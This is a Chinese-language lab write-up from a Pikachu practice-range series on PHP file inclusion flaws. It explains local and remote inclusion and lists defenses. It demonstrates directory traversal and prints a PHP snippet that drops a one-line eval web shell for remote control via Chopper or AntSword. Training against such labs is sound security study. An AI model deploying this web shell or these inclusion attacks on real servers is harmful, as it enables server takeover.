Pikachu靶场系列持续更新~
要像追剧追番一样追下去哦
实验六 —— 文件包含
文件包含概述
文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了:
include( )
当使用该函数包含文件时,只有代码执行到 include()函数时才将文件包含
进来,发生错误时之给出一个警告,继续向下执行。
include_once( )
功能与 Include()相同,区别在于当重复调用同一文件时,程序只调用一次
require( )
require()与 include()的区别在于 require()执行如果发生错误,函数会输出
错误信息,并终止脚本的运行。
require_once( )
功能与 require()相同,区别在于当重复调用同一文件时,程序只调用一次。
大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但是,有些时候,文件包含的代码文件被写成了一个变量,且这个变量可以由前端用户传进来,这种情况下,如果没有做足够的安全考虑,则可能会引发文件包含漏洞。 攻击着会指定一个“意想不到”的文件让包含函数去执行,从而造成恶意操作。
文件包含漏洞分为如下两种情况
本地文件包含漏洞:
仅能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者所能够控制的,因此该情况下,攻击着更多的会包含一些 固定的系统配置文件,从而读取系统敏感信息。很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞,从而形成更大的威力。
远程文件包含漏洞:
能够通过url地址对远程的文件进行包含,这意味着攻击者可以传入任意的代码,这种情况没啥好说的,准备挂彩。
防御
1.PHP 中使用 open_basedir 配置限制访问在指定的区域
2.过滤.(点)/(反斜杠)\(反斜杠)
3.禁止服务器远程文件包含
实验环境
我用的是phpstudy集成环境,一键搭环境 (如果端口没被占用还是比较顺利的)
靶场:Pikachu靶场下载
浏览器一个
接下来:
–>把下载下来的pikachu文件夹放到web服务器根目录下
–>根据实际情况修改inc/config.inc.php里面的数据库连接配置(登录名和密码要与数据库相同)
–>访问http://x.x.x.x/pikachu,会有一个红色的热情提示"欢迎使用,pikachu还没有初始化,点击进行初始化安装!",点击即可完成安装。
本地包含
加载出了本地的一个文件
本地文件包含需要攻击者自己猜目录及文件才能读取
尝试目录穿越到phpstudy的www目录下读取phpinfo.php
远程包含
攻击者可以通过访问外部地址来加载远程的代码
远程包含漏洞的前提:如果使用的incldue和require,则需修改php.ini配置
allow_url_fopen=on //默认打开
allow_url_include=on //默认关闭
尝试以http形式读取自身服务器的phpinfo文件
攻击者还可以自己搭建站点,所包含文件内写上恶意代码
<?php
$myfile=fopen("yijuhua.php","w");
$text='<?php @eval($_POST['yijuhua']);?>'; #'@'放在函数前有屏蔽出错信息的作用
fwrite($myfile,$text);
fclose($myfile);
?>
传入后台,后台的包含函数就会加载攻击者的恶意代码
最后可以利用菜刀或蚁剑连接
GOT IT!
******************************************************
这一文件包含模块先搞定了,关注收藏追更哦~